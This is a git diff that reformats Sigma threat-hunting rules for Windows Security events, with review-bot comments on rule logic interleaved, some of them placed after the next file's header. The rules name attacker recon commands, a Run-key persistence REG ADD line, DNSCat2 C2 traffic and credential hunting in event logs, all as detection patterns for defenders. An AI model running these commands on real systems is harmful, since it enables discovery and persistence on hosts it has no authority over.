https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1 
@@ -20,18 +19,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Import-Module ' - 'ipmo ' filter_main_vsstudio: - CommandLine|contains|all: + CommandLine|contains|all: - :\Program Files\Microsoft Visual Studio\ - Tools\Microsoft.VisualStudio.DevShell.dll ParentProcessName|contains: @@ -39,7 +38,6 @@ detection: - :\Windows\System32\cmd.exe condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Depending on the environement, many legitimate scripts will import modules inline. - This rule is targeted for hunting purposes. + - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes. level: low ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml index 85a9b1aa6..248f2d2a7 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml 
@@ -1,16 +1,12 @@ title: Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly id: ce2c44b5-a6ac-412a-afba-9e89326fa972 related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: similar + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: similar status: experimental -description: 'Detects execution of regsvr32 with the silent flag and no other flags - on a DLL located in an uncommon or potentially suspicious location. - - When Regsvr32 is called in such a way, it implicitly calls the DLL export function - ''DllRegisterServer''. - - ' +description: | + Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. + When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'. references: - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection 
@@ -30,33 +26,33 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cmdline: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' /e ' filter_main_paths: - - CommandLine|contains: - - :\Program Files (x86) - - :\Program Files\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ - - CurrentDirectory|contains: - - :\Program Files (x86) - - :\Program Files\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ + - CommandLine|contains: + - :\Program Files (x86) + - :\Program Files\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ + - CurrentDirectory|contains: + - :\Program Files (x86) + - :\Program Files\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ filter_main_other_flags: - CommandLine|contains: + # Note: We filter other flags to keep the logic of the rule + CommandLine|contains: - ' /i:' - '/U ' filter_main_rpcproxy: ParentCommandLine|endswith: :\Windows\System32\RpcProxy\RpcProxy.dll - CommandLine: regsvr32 /s rpcproxy.dll + CommandLine: regsvr32 /s rpcproxy.dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Legitimate usage as part of application installation, but less likely from e.g. - temporary paths. + - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml index 82144b165..c76ae5663 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml 
@@ -1,14 +1,11 @@ title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly id: d81a9fc6-55db-4461-b962-0e78fea5b0ad related: - - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed - type: similar + - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed rundll32 + type: similar status: experimental -description: 'Detects when the DLL export function ''DllRegisterServer'' is called - in the commandline by Rundll32 explicitly where the DLL is located in a non-standard - path. - - ' +description: | + Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. references: - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior @@ -27,21 +24,19 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cmdline: - CommandLine|contains: DllRegisterServer + CommandLine|contains: DllRegisterServer filter_main_legit_paths: - CommandLine|contains: + CommandLine|contains: - :\Program Files (x86) - :\Program Files\ - :\Windows\System32\ - :\Windows\SysWOW64\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Legitimate usage as part of application installation, but less likely from e.g. - temporary paths. - - Not every instance is considered malicious, but this rule will capture the malicious - usages. + - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. + - Not every instance is considered malicious, but this rule will capture the malicious usages. level: medium ruletype: Sigma 
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml index c531c4226..21cd7aab9 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Compression Tool Parameters id: 27a72a60-7e5e-47b1-9d17-909c9abafdcd status: test -description: Detects potentially suspicious command line arguments of common data - compression tools +description: Detects potentially suspicious command line arguments of common data compression tools references: - https://twitter.com/SBousseaden/status/1184067445612535811 author: Florian Roth (Nextron Systems), Samir Bousseaden @@ -24,7 +23,7 @@ detection: - 7z*.exe - '*rar.exe' - '*Command*Line*RAR*' - CommandLine|contains: + CommandLine|contains: - ' -p' - ' -ta' - ' -tb' diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml index 2af18b82d..33d7ad436 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml 
@@ -1,14 +1,11 @@ title: Elevated System Shell Spawned id: 61065c72-5d7d-44ef-bf41-6a36684b545f related: - - id: 178e615d-e666-498b-9630-9ed363038101 - type: similar + - id: 178e615d-e666-498b-9630-9ed363038101 + type: similar status: experimental -description: 'Detects when a shell program such as the Windows command prompt or PowerShell - is launched with system privileges. Use this rule to hunt for potential suspicious - processes. - - ' +description: | + Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. references: - https://github.com/Wh04m1001/SysmonEoP author: Nasreddine Bencherchali (Nextron Systems), frack113 @@ -27,16 +24,16 @@ detection: EventID: 4688 Channel: Security selection_shell: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe selection_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI SubjectLogonId: '0x3e7' diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml index 1ff0c8b56..e68e65835 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml 
@@ -1,14 +1,11 @@ title: EventLog Query Requests By Builtin Utilities id: 9cd55b6c-430a-4fa9-96f4-7cadf5229e9f related: - - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf - type: derived + - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf + type: derived status: experimental -description: 'Detect attempts to query the contents of the event log using command - line utilities. Attackers use this technique in order to look for sensitive information - in the logs such as passwords, usernames, IPs, etc. - - ' +description: | + Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1 
@@ -28,27 +25,26 @@ detection: EventID: 4688 Channel: Security selection_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - Select - Win32_NTLogEvent selection_wevtutil_img: - - NewProcessName|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - NewProcessName|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wevtutil_cli: - CommandLine|contains: + CommandLine|contains: - ' qe ' - ' query-events ' selection_wmic_img: - - NewProcessName|endswith: \wevtutil.exe - - OriginalFileName: wevtutil.exe + - NewProcessName|endswith: \wevtutil.exe + - OriginalFileName: wevtutil.exe selection_wmic_cli: - CommandLine|contains: ' ntevent' + CommandLine|contains: ' ntevent' selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Get-WinEvent ' - 'get-eventlog ' - condition: process_creation and (selection_wmi or all of selection_wevtutil_* - or all of selection_wmic_* or selection_cmdlet) + condition: process_creation and (selection_wmi or all of selection_wevtutil_* or all of selection_wmic_* or selection_cmdlet) falsepositives: - Legitimate log access by administrators or troubleshooting tools level: medium diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml index 9cf24f1c6..4feb484b7 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml 
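Review bot: `selection_wmic_img` in this hunk still matches `\wevtutil.exe` / `wevtutil.exe`, so the `all of selection_wmic_*` branch of the condition can only fire when wevtutil.exe is launched with ` ntevent` on its command line and never for `wmic ... ntevent`; it looks like a copy of `selection_wevtutil_img` that the re-indent carries over unchanged. The image selector should name the WMI utility, i.e. `selection_wmic_img:` / `- NewProcessName|endswith: \wmic.exe` / `- OriginalFileName: wmic.exe`. As written the rule silently loses the wmic.exe coverage that the title, the `selection_wmic_cli` selector and the `Win32_NTLogEvent` selector imply, while the wevtutil branch already covers wevtutil on its own.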
@@ -21,34 +21,32 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - /grant - /setowner - - /inheritance:r - NewProcessName|endswith: + - /inheritance:r # Remove all inherited ACEs + NewProcessName|endswith: - \cacls.exe - \icacls.exe - - \net.exe - - \net1.exe + - \net.exe # "grant" Option available when used with "net share" + - \net1.exe # "grant" Option available when used with "net share" selection_2: - CommandLine|contains: -r - NewProcessName|endswith: \attrib.exe + CommandLine|contains: -r + NewProcessName|endswith: \attrib.exe selection_3: - NewProcessName|endswith: \takeown.exe + NewProcessName|endswith: \takeown.exe filter_optional_dynatrace_1: - CommandLine|endswith: ICACLS C:\ProgramData\dynatrace\gateway\config\connectivity.history - /reset + CommandLine|endswith: ICACLS C:\ProgramData\dynatrace\gateway\config\connectivity.history /reset filter_optional_dynatrace_2: - CommandLine|contains|all: - - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant - :r ' + CommandLine|contains|all: + - 'ICACLS C:\ProgramData\dynatrace\gateway\config\config.properties /grant :r ' - S-1-5-19:F filter_optional_vscode: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Programs\Microsoft VS Code - :\Program Files\Microsoft VS Code filter_optional_avira: - CommandLine|contains: + CommandLine|contains: - :\Program Files (x86)\Avira - :\Program Files\Avira condition: process_creation and (1 of selection_* and not 1 of filter_optional_*) diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml index 822bdb61a..f0b5540d6 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml 
@@ -1,14 +1,9 @@ title: Process Terminated Via Taskkill id: 86085955-ea48-42a2-9dd3-85d4c36b167d status: experimental -description: 'Detects execution of "taskkill.exe" in order to stop a service or a - process. Look for suspicious parents executing this command in order to hunt for - potential malicious activity. - - Attackers might leverage this in order to conduct data destruction or data encrypted - for impact on the data stores of services like Exchange and SQL Server. - - ' +description: | + Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. + Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process author: frack113 @@ -26,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \taskkill.exe - - OriginalFileName: taskkill.exe + - NewProcessName|endswith: \taskkill.exe + - OriginalFileName: taskkill.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /f' - ' /im ' filter_main_installers: @@ -39,7 +34,6 @@ detection: ParentProcessName|endswith: .tmp condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Expected FP with some processes using this techniques to terminate one of their - processes during installations and updates + - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates level: low ruletype: Sigma 
diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml index 661a07f2c..25ba0f3b4 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml @@ -1,18 +1,13 @@ title: System Information Discovery Via Wmic.EXE id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e related: - - id: 9d5a1274-922a-49d0-87f3-8c653483b909 - type: derived + - id: 9d5a1274-922a-49d0-87f3-8c653483b909 + type: derived status: experimental -description: 'Detects the use of the WMI command-line (WMIC) utility to identify and - display various system information, - - including OS, CPU, GPU, disk drive names, memory capacity, display resolution, - baseboard, BIOS, - +description: | + Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, + including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ @@ -35,13 +30,13 @@ detection: EventID: 4688 Channel: Security selection_wmic: - - Description: WMI Commandline Utility - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - Description: WMI Commandline Utility + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_get: - CommandLine|contains: get + CommandLine|contains: get selection_classes: - CommandLine|contains: + CommandLine|contains: - baseboard - bios - cpu 
@@ -53,7 +48,7 @@ detection: - startup - win32_videocontroller selection_attributes: - CommandLine|contains: + CommandLine|contains: - caption - command - driverversion @@ -70,5 +65,6 @@ detection: condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - VMWare Tools serviceDiscovery scripts +# Note: Might be upgraded to a medium detection rules after some time level: low ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml b/sigma/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml index 0c0ee2f05..e6ff79350 100644 --- a/sigma/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml +++ b/sigma/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml @@ -1,12 +1,10 @@ title: Microsoft Office Trusted Location Updated id: a0bed973-45fa-4625-adb5-6ecdf9be70ac related: - - id: f742bde7-9528-42e5-bd82-84f51a8387d2 - type: similar + - id: f742bde7-9528-42e5-bd82-84f51a8387d2 + type: similar status: experimental -description: Detects changes to the registry keys related to "Trusted Location" of - Microsoft Office. Attackers might add additional trusted locations to avoid macro - security restrictions. +description: Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. references: - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -35,7 +33,6 @@ detection: - :\Program Files (x86)\Microsoft Office\ condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - During office installations or setup, trusted locations are added, which will - trigger this rule. + - During office installations or setup, trusted locations are added, which will trigger this rule. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml b/sigma/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml index 9c84b44da..b93fbb685 100644 --- a/sigma/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml +++ b/sigma/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml @@ -1,15 +1,10 @@ title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace id: 1c2a3268-3881-414a-80af-a5b313b14c0e status: experimental -description: 'Detects the setting of a registry inside the "\Shell\Open\Command" value - with PowerShell classes from the "System.Security.Cryptography" namespace. - - The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly - encryption and decryption. - +description: | + Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. + The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. - - ' references: - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0 - https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/ 
@@ -29,7 +24,7 @@ detection: EventID: 4657 Channel: Security selection_key: - OperationType: '%%1905' + OperationType: '%%1905' ObjectName|contains: \Shell\Open\Command selection_value_img: NewValue|contains: @@ -48,7 +43,6 @@ detection: - .TripleDESCryptoServiceProvider condition: registry_set and (all of selection_*) falsepositives: - - Classes are legitimately used, but less so when e.g. parents with low prevalence - or decryption of content in temporary folders. + - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml b/sigma/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml index cdee02e38..ea9bfcba6 100644 --- a/sigma/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml +++ b/sigma/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml @@ -1,9 +1,7 @@ title: Scheduled Task Deletion id: 4f86b304-3e02-40e3-aa5d-e88a167c9617 status: test -description: Detects scheduled task deletion events. Scheduled tasks are likely to - be deleted if not used for persistence. Malicious Software often creates tasks - directly under the root node e.g. \TASKNAME +description: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME references: - https://twitter.com/matthewdunwoody/status/1352356685982146562 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699 
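Review bot: `selection_key` in this hunk pins `OperationType: '%%1905'`, which in Security event 4657 denotes an existing value being modified (if I read the 4657 operation codes correctly); a `\Shell\Open\Command` value being written for the first time is reported with `%%1904` (new value created) and would not match, although the title and description describe the value being "set". If both cases are intended, widen it to `OperationType: ['%%1904', '%%1905']`. If this value comes from a shared `registry_set` mapping in the converter rather than this file, the fix belongs there, so treat this as a question to confirm before editing the rule by hand.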
@@ -19,19 +17,16 @@ tags: logsource: product: windows service: security - definition: 'Requirements: The Advanced Audit Policy setting Object Access > Audit - Other Object Access Events has to be configured to allow this detection. We - also recommend extracting the Command field from the embedded XML in the event - data.' + definition: 'Requirements: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.' detection: security: Channel: Security selection: EventID: 4699 filter_main_generic: - TaskName: \Microsoft\Windows\RemovalTools\MRT_ERROR_HB + TaskName: \Microsoft\Windows\RemovalTools\MRT_ERROR_HB # Triggered by ParentCommandLine=C:\WINDOWS\system32\MRT.exe /EHB /HeartbeatFailure ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=SubmitHeartbeatReportData,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f /HeartbeatError 0x80072f8f filter_main_firefox: - TaskName|contains: '\Mozilla\Firefox Default Browser Agent ' + TaskName|contains: '\Mozilla\Firefox Default Browser Agent ' # Triggered by firefox updates condition: security and (selection and not 1 of filter_*) falsepositives: - Software installation diff --git a/sigma/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml b/sigma/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml index 193710402..7b3ecb80f 100644 --- a/sigma/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml +++ b/sigma/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml 
@@ -1,8 +1,7 @@ title: Execution via CL_Mutexverifiers.ps1 (2 Lines) id: 6609c444-9670-4eab-9636-fe4755a851ce status: unsupported -description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 - module +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module references: - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ - https://twitter.com/pabraeken/status/995111125447577600 diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml index c53f25542..192a89fc8 100644 --- a/sigma/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml +++ b/sigma/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml @@ -22,16 +22,15 @@ detection: EventID: 4688 Channel: Security selection_recon: - CommandLine|contains: '>>' - CommandLine|endswith: temps.dat - NewProcessName|endswith: + CommandLine|contains: '>>' + CommandLine|endswith: temps.dat + NewProcessName|endswith: - \tasklist.exe - \qwinsta.exe - \ipconfig.exe - \hostname.exe selection_persistence: - CommandLine|contains: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" - /v "WinNetworkSecurity" /t REG_SZ /d + CommandLine|contains: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinNetworkSecurity" /t REG_SZ /d condition: process_creation and (selection_recon | near selection_persistence) fields: - SubjectUserName diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml index 51dd4f9a1..8b0a7a208 100644 --- a/sigma/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml +++ b/sigma/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml 
@@ -24,11 +24,11 @@ detection: EventID: 4688 Channel: Security netCommand1: - CommandLine: net view /DOMAIN + CommandLine: net view /DOMAIN netCommand2: - CommandLine: net session + CommandLine: net session netCommand3: - CommandLine: net share + CommandLine: net share timeframe: 1m condition: process_creation and (netCommand1 | near netCommand2 and netCommand3) falsepositives: diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml index fef0c6227..501e0f974 100644 --- a/sigma/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml +++ b/sigma/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml @@ -1,9 +1,7 @@ title: DNSCat2 Powershell Implementation Detection Via Process Creation id: b11d75d6-d7c1-11ea-87d0-0242ac130003 status: unsupported -description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. - Counting nslookup processes spawned by PowerShell will show hundreds or thousands - of instances if PS DNSCat2 is active locally. +description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally. references: - https://github.com/lukebaggett/dnscat2-powershell - https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html 
@@ -25,13 +23,12 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|endswith: \nslookup.exe
+ CommandLine|endswith: \nslookup.exe
 ParentProcessName|endswith:
 - \powershell.exe
 - \pwsh.exe
- NewProcessName|endswith: \nslookup.exe
- condition: (process_creation and selection) | count(NewProcessName) by ParentNewProcessName
- > 100
+ NewProcessName|endswith: \nslookup.exe
+ condition: (process_creation and selection) | count(NewProcessName) by ParentNewProcessName > 100
 fields:
 - NewProcessName
 - ParentProcessName
diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml
index 18fa0c50d..42a361338 100644
--- a/sigma/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml
+++ b/sigma/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml
@@ -19,7 +19,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- CommandLine|contains:
+ CommandLine|contains:
 - arp.exe
 - at.exe
 - attrib.exe
@@ -62,7 +62,6 @@ detection:
 timeframe: 5m
 condition: (process_creation and selection) | count() by MachineName > 5
 falsepositives:
- - False positives depend on scripts and administrative tools used in the monitored
- environment
+ - False positives depend on scripts and administrative tools used in the monitored environment
 level: low
 ruletype: Sigma
diff --git a/sigma/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml b/sigma/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml
index c8b073b0e..4fcf50cbe 100644
--- a/sigma/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml
+++ b/sigma/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml
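Review bot: The re-joined `condition` line in the DNSCat2 rule still aggregates `by ParentNewProcessName`, a field that appears nowhere else in the rule: the selection matches on `ParentProcessName|endswith` and the `fields` list names `ParentProcessName`, so the count is keyed on a field the matched events are unlikely to carry. If the intent is to count nslookup children per parent, I would expect `condition: (process_creation and selection) | count(NewProcessName) by ParentProcessName > 100`. This inconsistency predates the commit and the rule is marked unsupported, so the reflow preserves it rather than introduces it; the multiple_susp_cli hunks on this line do not have the same issue.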
@@ -1,8 +1,7 @@
 title: Reconnaissance Activity Using BuiltIn Commands
 id: 2887e914-ce96-435f-8105-593937e90757
 status: unsupported
-description: Detects execution of a set of builtin commands often used in recon stages
- by different attack groups
+description: Detects execution of a set of builtin commands often used in recon stages by different attack groups
 references:
 - https://twitter.com/haroonmeer/status/939099379834658817
 - https://twitter.com/c_APT_ure/status/939475433711722497
@@ -23,29 +22,28 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- - CommandLine:
- - tasklist
- - net time
- - systeminfo
- - whoami
- - nbtstat
- - net start
- - qprocess
- - nslookup
- - hostname.exe
- - netstat -an
- - CommandLine|endswith:
- - \net1 start
- - \net1 user /domain
- - \net1 group /domain
- - \net1 group "domain admins" /domain
- - \net1 group "Exchange Trusted Subsystem" /domain
- - \net1 accounts /domain
- - \net1 user net localgroup administrators
+ - CommandLine:
+ - tasklist
+ - net time
+ - systeminfo
+ - whoami
+ - nbtstat
+ - net start
+ - qprocess
+ - nslookup
+ - hostname.exe
+ - netstat -an
+ - CommandLine|endswith:
+ - \net1 start
+ - \net1 user /domain
+ - \net1 group /domain
+ - \net1 group "domain admins" /domain
+ - \net1 group "Exchange Trusted Subsystem" /domain
+ - \net1 accounts /domain
+ - \net1 user net localgroup administrators
 timeframe: 15s
 condition: (process_creation and selection) | count() by CommandLine > 4
 falsepositives:
- - False positives depend on scripts and administrative tools used in the monitored
- environment
+ - False positives depend on scripts and administrative tools used in the monitored environment
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml b/sigma/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml
index c30c52a29..da5cdd059 100644
--- a/sigma/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml
